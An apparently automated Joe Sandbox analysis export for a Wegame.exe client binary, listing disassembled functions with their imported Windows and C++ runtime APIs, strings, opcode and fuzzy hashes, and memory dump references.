                                                                • API ID: ?get_log_instance@base@@?scale_path2absolute_path@common@ierd_tgp@@H_prolog3H_prolog3_H_prolog3_catch_Logger@1@PrivateProfileSimpleStringString::operator=U?$char_traits@_V34@@V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@Write
                                                                • String ID: CrashCount$WeGame$[tgp_daemon_main]before_exit$crash_log.rs$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 3541447787-2719369139
                                                                • Opcode ID: cdc5cb36d2b95f31113b04062ea74571f23f66d5818f240badeb5fa76941f7df
                                                                • Instruction ID: 7585d081478f80a79bd25a068a72f9f2ef0086c64b57d84b9c269b6e0f43d5af
                                                                • Opcode Fuzzy Hash: cdc5cb36d2b95f31113b04062ea74571f23f66d5818f240badeb5fa76941f7df
                                                                • Instruction Fuzzy Hash: C7218171D01204EBCF10EBA2C852ADEB7B4AF54718F20415EE041B71C2EB785A45CBAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00462884 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 64windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0046288B
                                                                • ?IsStartFromUrlProtocol@Sys_wrapper@common@ierd_tgp@@SA_NXZ.COMMON(00000058), ref: 00462890
                                                                • GetCommandLineW.KERNEL32(00000058), ref: 0046289D
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,00000000), ref: 004628D0
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON ref: 004628F9
                                                                • FindWindowA.USER32(Static,?), ref: 00462916
                                                                • IsWindow.USER32(00000000), ref: 0046291F
                                                                • SendMessageA.USER32(00000000,0000004A,00000000,?), ref: 00462931
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@Window$?get_coexist_name@util_multi_instance@ierd_tgp@@?u16to8@common@ierd_tgp@@CommandD@2@@4@@D@2@@std@@FindFromH_prolog3_LineMessageProtocol@SendStartSys_wrapper@common@ierd_tgp@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
                                                                • String ID: Static$TGP_EXTERNAL_MESSAGE_RECEIVER
                                                                • API String ID: 31688673-2810635197
                                                                • Opcode ID: f3005701164a7cc07b963ab3d9e48d046d5d9408ebfa2f701fae6e38e6dd0e8d
                                                                • Instruction ID: 04cadd192b78544d37771fb7e5a4b2cc22781b68b3e9901b7e829a1c75d60bc7
                                                                • Opcode Fuzzy Hash: f3005701164a7cc07b963ab3d9e48d046d5d9408ebfa2f701fae6e38e6dd0e8d
                                                                • Instruction Fuzzy Hash: EC213D70D01258DEDB00EFE5C9459DEBBB4EF08314F64406EE505B7142E7785A45CBAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043A870 Relevance: 15.2, APIs: 10, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memmove.VCRUNTIME140(?,06666666,?,?,?,?,85A35C35,?,?), ref: 0043A927
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,85A35C35,?,?), ref: 0043A94C
                                                                • memset.VCRUNTIME140(85A35C35,00000000,?,00000000,?,?,?,?,?,85A35C35,?,?), ref: 0043A962
                                                                • memset.VCRUNTIME140(?,00000000,?,85A35C35,00000000,?,00000000,?,?,?,?,?,85A35C35,?,?), ref: 0043A96E
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,85A35C35,?,?), ref: 0043A97F
                                                                • memmove.VCRUNTIME140(?,00000000,?,00000000,?,?,?,?,?,85A35C35,?,?), ref: 0043A9A0
                                                                • memset.VCRUNTIME140(?,00000000,?,?,00000000,?,00000000,?,?,?,?,?,85A35C35,?,?), ref: 0043A9AE
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,85A35C35,?,?), ref: 0043A9FC
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,85A35C35,?,?), ref: 0043AA1D
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,85A35C35,?,?), ref: 0043AA57
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$memset$_invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 3802980928-0
                                                                • Opcode ID: 567315be93d4bff90a374e46ab5f9da2bdda8fb9651dace86e3fd5ee18a3e5f0
                                                                • Instruction ID: 61b535d2286fc7680c76b3e68254a05feffd87e09152fbba5a08ab0459d8a44f
                                                                • Opcode Fuzzy Hash: 567315be93d4bff90a374e46ab5f9da2bdda8fb9651dace86e3fd5ee18a3e5f0
                                                                • Instruction Fuzzy Hash: 6E515871D00100ABDB18DB29DC85BAFB7A9EF84314F15862EE859A3240D738BD55C79A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046C3C5 Relevance: 15.1, APIs: 10, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C3C9
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C3E6
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C3F2
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C405
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C411
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C41B
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C427
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C437
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C443
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C450
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?pptr@?$basic_streambuf@
                                                                • String ID:
                                                                • API String ID: 2505503336-0
                                                                • Opcode ID: 1e1757178f828a508dffdc53c463c6233015a36ac60cb5e22f99adb805cbd11c
                                                                • Instruction ID: 8327e6cf5968448ec44aede2c426c2109edab57b60843ce3fe0db5ac8dff18fa
                                                                • Opcode Fuzzy Hash: 1e1757178f828a508dffdc53c463c6233015a36ac60cb5e22f99adb805cbd11c
                                                                • Instruction Fuzzy Hash: 8E111C347005118B87159B39D59C47CB7B2BF8571130906A6E846C7B61EF38EC929B8D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00450305 Relevance: 15.1, APIs: 10, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450309
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450323
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0045032F
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450342
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0045034E
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450358
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450364
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450374
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450380
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0045038D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?pptr@?$basic_streambuf@
                                                                • String ID:
                                                                • API String ID: 2505503336-0
                                                                • Opcode ID: bd4fc22995c0fdce85be371cbc69ec304f1d98dc6655763778ffe19403ef08fe
                                                                • Instruction ID: 9e38ab77da35b6deb1577abe5d722ccb8906f565af6cb10a842c208767488dbf
                                                                • Opcode Fuzzy Hash: bd4fc22995c0fdce85be371cbc69ec304f1d98dc6655763778ffe19403ef08fe
                                                                • Instruction Fuzzy Hash: 431130347115118BC7155B25D99813CBBB3BF8531234802AAEC0AC77A2CF78EC97DB89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046AA1D Relevance: 13.7, APIs: 9, Instructions: 186COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046AA3F
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046AA58
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?pptr@?$basic_streambuf@D@std@@@std@@U?$char_traits@
                                                                • String ID:
                                                                • API String ID: 1676136795-0
                                                                • Opcode ID: 7a5f694855c3797962f2840f9e355b8bdbe8fa8d93aaf5ce3de9d2a05157ccc5
                                                                • Instruction ID: 757ec4904a2ed327ae70e6f2da434a1b1364b55a11b160cfcf1390ec2688b3d7
                                                                • Opcode Fuzzy Hash: 7a5f694855c3797962f2840f9e355b8bdbe8fa8d93aaf5ce3de9d2a05157ccc5
                                                                • Instruction Fuzzy Hash: C3715775A006008FCB19CF6CC484969BBF5BF49700B1581AAEC06DB365EB34ED51CF99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040E7F0 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 350COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040E570: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(85A35C35), ref: 0040E60A
                                                                • memset.VCRUNTIME140(?,00000000,00000400,85A35C35,00000027,00000007), ref: 0040E851
                                                                • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000200,?,?,00000000,00000400,85A35C35,00000027,00000007), ref: 0040E877
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00485D1C,00000000,?,?), ref: 0040E97F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 0040EA3D
                                                                • memmove.VCRUNTIME140(00000008,00484A10,00000002,?,?), ref: 0040EAB1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memmovememsetwcscpy_s
                                                                • String ID: \..\$\.\
                                                                • API String ID: 165942512-457230051
                                                                • Opcode ID: e394b9754b45784545b45f93fac15ce82b392a754ade6de25117a80045140943
                                                                • Instruction ID: 25b704b83fc1f9d6d814e4478af9087140227cf4b919d7611edc7f1cb7de207c
                                                                • Opcode Fuzzy Hash: e394b9754b45784545b45f93fac15ce82b392a754ade6de25117a80045140943
                                                                • Instruction Fuzzy Hash: DBE1B3B1A001188ACB24DF25CC447AEB3B5AF44314F5449EEE60AB7681DB746ED4CF9D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402560 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 004026D3
                                                                • InitializeCriticalSection.KERNEL32(000000AF,?,?,00000000,00000000,00000000,00000000), ref: 0040275C
                                                                • InitializeCriticalSection.KERNEL32(000000DB,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 004027B8
                                                                • CreateEventW.KERNEL32(?,?,?,00000000,00000001,00000000,00000000), ref: 004027C9
                                                                  • Part of subcall function 0040ED60: memset.VCRUNTIME140(?,00000000,00000400,00000007), ref: 0040ED84
                                                                  • Part of subcall function 0040ED60: _wgetcwd.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,00000200,?,00000000,00000400,00000007), ref: 0040ED95
                                                                  • Part of subcall function 0040E7F0: memset.VCRUNTIME140(?,00000000,00000400,85A35C35,00000027,00000007), ref: 0040E851
                                                                  • Part of subcall function 0040E7F0: wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000200,?,?,00000000,00000400,85A35C35,00000027,00000007), ref: 0040E877
                                                                  • Part of subcall function 0040E7F0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00485D1C,00000000,?,?), ref: 0040E97F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,00000001,00000000,00000000), ref: 00402873
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$CriticalInitializeSection_invalid_parameter_noinfo_noreturn$CreateEvent_wgetcwdwcscpy_s
                                                                • String ID: C:\$VFSHelper::VFSHelper()
                                                                • API String ID: 2753070241-1341794421
                                                                • Opcode ID: bb13500e9704f3aa0231f7f761f4cf78110c34b6ed7e762edee82db7229d2b98
                                                                • Instruction ID: d5a35042f9391f9f53c54d242e770c1e03323d5a72465c95ff77e375617cc7c7
                                                                • Opcode Fuzzy Hash: bb13500e9704f3aa0231f7f761f4cf78110c34b6ed7e762edee82db7229d2b98
                                                                • Instruction Fuzzy Hash: 38B135B0901746DFE720DF69C90478AFBF0BF44708F208A1EE499AB781D7B96584CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040A450 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 196COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35), ref: 0040A4A3
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040A5AC
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040A60A
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040A638
                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 0040A653
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040A6A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection_invalid_parameter_noinfo_noreturn$Leave$Enter
                                                                • String ID: VFSHelper::PreLoad()
                                                                • API String ID: 3200987562-3430744311
                                                                • Opcode ID: 0458d41804cd19b89b84f166fa29019427a03daa07e8c9c6dd46a35bed7b7f8b
                                                                • Instruction ID: 039b1a46b9cfac7b428c27ff86fe46c22b29a4e417e1cbbc7113313b043f08e3
                                                                • Opcode Fuzzy Hash: 0458d41804cd19b89b84f166fa29019427a03daa07e8c9c6dd46a35bed7b7f8b
                                                                • Instruction Fuzzy Hash: 2F71E231D102489BDB04DFA8CD48BDEBBB1FF85318F14422AE405AB3D0D7799A94CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00468732 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(?,00000000,00000000,?,?,?,73E,00455A0C,00000000,00453337,?,00000001,000000DC,00452F44,?), ref: 00468759
                                                                • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(?,00000000,00000000,?,?,?,73E,00455A0C,00000000,00453337,?,00000001,000000DC,00452F44,?), ref: 00468778
                                                                • ?precision@ios_base@std@@QAE_J_J@Z.MSVCP140(004411C6,?,00000000,?,?,?,73E,00455A0C,00000000,00453337,?,00000001,000000DC,00452F44,?), ref: 00468791
                                                                • ?flags@ios_base@std@@QAEHH@Z.MSVCP140(?,00000000,?,?,?,73E,00455A0C,00000000,00453337,?,00000001,000000DC,00452F44,?,?,Function_00052DFA), ref: 004687A9
                                                                • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,Function_00052DFA,0044120E,0044125A,00000014,00453359,?,73E), ref: 004687B6
                                                                • ?exceptions@ios_base@std@@QAEXH@Z.MSVCP140(?,?,Function_00052DFA,0044120E,0044125A,00000014,00453359,?,73E), ref: 004687C1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?exceptions@ios_base@std@@?flags@ios_base@std@@?imbue@?$basic_ios@?precision@ios_base@std@@?width@ios_base@std@@V32@@Vlocale@2@
                                                                • String ID: 73E
                                                                • API String ID: 910353691-750320168
                                                                • Opcode ID: b0ffd9db7423c4d1dd59f60a132d7b67fd469de36cdb62e0d9a260656356a4e7
                                                                • Instruction ID: 1e60cbe320f377dc2335b69e365bbd7affdb80f566fad41aa5e7c8f05c358cfd
                                                                • Opcode Fuzzy Hash: b0ffd9db7423c4d1dd59f60a132d7b67fd469de36cdb62e0d9a260656356a4e7
                                                                • Instruction Fuzzy Hash: AD116035210604AFCB259F15CC48E6ABBB6FF84321B144A1DF897926B0EB34E896DB15
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00412990 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 286COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,0041236F,?,?,?,?,?,?,?,?), ref: 004129F0
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,0041236F,?,?,?,?,?,?,?,?), ref: 00412AD3
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,0041236F,?,?,?,?,?,?,?), ref: 00412AF1
                                                                • memmove.VCRUNTIME140(?,?,?), ref: 00412B7E
                                                                • memmove.VCRUNTIME140(?,?,00000000,?,?,?,?,?,?,?,?,0041236F,?,?,?,?), ref: 00412BA6
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041236F,?), ref: 00412C23
                                                                • memmove.VCRUNTIME140(?,?,?), ref: 00412C46
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove
                                                                • String ID: o#A
                                                                • API String ID: 2162964266-62411624
                                                                • Opcode ID: b646163f54e8b8b64e7afeb2c85c4e463208a4724331d401d4f59b996b668034
                                                                • Instruction ID: 5fdecc2a9fd540ba1411bf0742c8b4be7afed831291808f840e26320582f2d88
                                                                • Opcode Fuzzy Hash: b646163f54e8b8b64e7afeb2c85c4e463208a4724331d401d4f59b996b668034
                                                                • Instruction Fuzzy Hash: 6BB19271A0024A9FCB11CF6CC6809EEFFB5FF8530472981A9D458DB302D774AA96CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043AC70 Relevance: 12.2, APIs: 8, Instructions: 160COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memmove.VCRUNTIME140(?,0FFFFFFF,?,?,?,?,00000000,85A35C35,?,?), ref: 0043AD2D
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043AD52
                                                                • memset.VCRUNTIME140(00000000,00000000,00000001,00000000,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043AD6A
                                                                • memset.VCRUNTIME140(?,00000000,?,00000000,00000000,00000001,00000000,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043AD76
